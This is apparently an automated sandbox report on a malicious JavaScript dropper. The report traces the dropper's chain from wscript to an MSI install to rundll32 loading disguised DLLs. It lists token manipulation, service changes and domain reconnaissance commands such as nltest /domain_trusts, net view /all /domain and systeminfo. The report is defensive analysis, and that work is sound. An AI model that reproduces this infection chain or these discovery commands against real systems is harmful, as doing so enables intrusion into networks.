Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAF0A78 NtClose,	7_2_00000201DAAF0A78
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7ACC NtClose,	7_2_00000201DAAE7ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAF0AC0 NtFreeVirtualMemory,	7_2_00000201DAAF0AC0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE78C0 NtReadFile,	7_2_00000201DAAE78C0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE745C RtlInitUnicodeString,NtOpenFile,NtClose,	7_2_00000201DAAE745C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7588 RtlInitUnicodeString,NtCreateFile,NtClose,	7_2_00000201DAAE7588
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE79C8 NtClose,	7_2_00000201DAAE79C8
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7704 NtQueryInformationFile,	7_2_00000201DAAE7704
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950AD34 NtAllocateVirtualMemory,	8_2_000001A37950AD34
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507B40 NtFreeVirtualMemory,	8_2_000001A379507B40
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507694 RtlInitUnicodeString,NtDeleteFile,	8_2_000001A379507694
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379510AC0 NtFreeVirtualMemory,	8_2_000001A379510AC0
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A3795078C0 NtReadFile,	8_2_000001A3795078C0
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507A54 NtWriteFile,	8_2_000001A379507A54
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950745C RtlInitUnicodeString,NtOpenFile,NtClose,	8_2_000001A37950745C
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507704 NtQueryInformationFile,	8_2_000001A379507704
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950B0C4 NtOpenKey,	8_2_000001A37950B0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507ACC NtClose,	8_2_000001A379507ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507588 RtlInitUnicodeString,NtCreateFile,NtClose,	8_2_000001A379507588
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950378C NtClose,	8_2_000001A37950378C
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A3795077B0 RtlInitUnicodeString,NtCreateFile,	8_2_000001A3795077B0
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950CB54 NtDelayExecution,	8_2_000001A37950CB54
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,	8_2_000001A37950463C
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	8_2_000001A37950B1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A3795079C8 NtClose,	8_2_000001A3795079C8

Contains functionality to communicate with device drivers

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018006A2C8: DeviceIoControl,

6_2_000000018006A2C8

Contains functionality to launch a process as a different user

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,

6_2_000000018004B1A4

Creates files inside the system directory

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIAA9D.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI39EE.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A4C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A7C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3AAC.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3AEC.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3B6A.tmp	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI39EE.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_006F6A50	4_2_006F6A50
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072F032	4_2_0072F032
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071E270	4_2_0071E270
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071C2CA	4_2_0071C2CA
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_007292A9	4_2_007292A9
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_007284BD	4_2_007284BD
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071A587	4_2_0071A587
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_006FC870	4_2_006FC870
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072D8D5	4_2_0072D8D5
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00714920	4_2_00714920
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071A915	4_2_0071A915
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00720A48	4_2_00720A48
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_006F9CC0	4_2_006F9CC0
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00725D6D	4_2_00725D6D
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180017FE8	6_2_0000000180017FE8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006DFF4	6_2_000000018006DFF4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800220D8	6_2_00000001800220D8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007C140	6_2_000000018007C140
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180060174	6_2_0000000180060174
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018008023C	6_2_000000018008023C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000834C	6_2_000000018000834C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006C470	6_2_000000018006C470
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800784E0	6_2_00000001800784E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800764F0	6_2_00000001800764F0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180060578	6_2_0000000180060578
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180010580	6_2_0000000180010580
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004E5DC	6_2_000000018004E5DC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180062600	6_2_0000000180062600
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180002610	6_2_0000000180002610
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180004638	6_2_0000000180004638
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004A650	6_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006E760	6_2_000000018006E760
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800647B0	6_2_00000001800647B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007E7C7	6_2_000000018007E7C7
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180076930	6_2_0000000180076930
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180062954	6_2_0000000180062954
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006A994	6_2_000000018006A994
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006E9FC	6_2_000000018006E9FC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180082A18	6_2_0000000180082A18
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180072A27	6_2_0000000180072A27
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180010B58	6_2_0000000180010B58
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180026C84	6_2_0000000180026C84
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001ECF4	6_2_000000018001ECF4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180008E20	6_2_0000000180008E20
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180052FD8	6_2_0000000180052FD8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018003AFE8	6_2_000000018003AFE8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005D014	6_2_000000018005D014
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006F0B4	6_2_000000018006F0B4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800630CC	6_2_00000001800630CC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005912C	6_2_000000018005912C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004B1A4	6_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180049278	6_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007B2D0	6_2_000000018007B2D0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002B2EC	6_2_000000018002B2EC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006D3D4	6_2_000000018006D3D4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800033E0	6_2_00000001800033E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180075480	6_2_0000000180075480
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800694A0	6_2_00000001800694A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005958C	6_2_000000018005958C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800576DC	6_2_00000001800576DC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800097E0	6_2_00000001800097E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800277FC	6_2_00000001800277FC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002D964	6_2_000000018002D964
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180073B60	6_2_0000000180073B60
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007BBB0	6_2_000000018007BBB0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001BC38	6_2_000000018001BC38
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005DD18	6_2_000000018005DD18
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180073DF0	6_2_0000000180073DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180011DF0	6_2_0000000180011DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005BE6C	6_2_000000018005BE6C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004FF88	6_2_000000018004FF88
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC851030	6_2_00000187EC851030
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE1030	7_2_00000201DAAE1030
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379501030	8_2_000001A379501030

Found potential string decryption / allocating functions

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000000018000CF30 appears 33 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180005348 appears 71 times
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: String function: 0071325F appears 103 times
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: String function: 00713790 appears 39 times
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: String function: 00713292 appears 70 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: Document_a19_79b555791-28h97348k5477-3219g9.js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal100.spre.troj.evad.winJS@40/28@2/3

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess,	6_2_0000000180049050
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,	6_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,	6_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,	6_2_000000018008395A

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006F3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,

4_2_006F3860

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006F4BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,

4_2_006F4BA0

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006F45B0 LoadResource,LockResource,SizeofResource,

4_2_006F45B0

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,

6_2_0000000180049AEC

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5C8CC0A7FE31816B4641D0465402560

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_03
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\runnung
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF428E4FF550ED71C3.TMP

Jump to behavior

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\Installer\MSI3B6A.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Installer\MSI3B6A.tmp

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq

Source: rundll32.exe, rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	Binary or memory string: select * from sqlite_sequence;
Source: rundll32.exe, rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	Binary or memory string: update sqlite_sequence set seq = 0 where name='MT';

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a19_79b555791-28h97348k5477-3219g9.js"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3F033F6E254CA40A6D9A0D485CFEA9D1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI3B6A.tmp "C:\Windows\Installer\MSI3B6A.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\Installer\MSI3B6A.tmp	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3F033F6E254CA40A6D9A0D485CFEA9D1	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI3B6A.tmp "C:\Windows\Installer\MSI3B6A.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
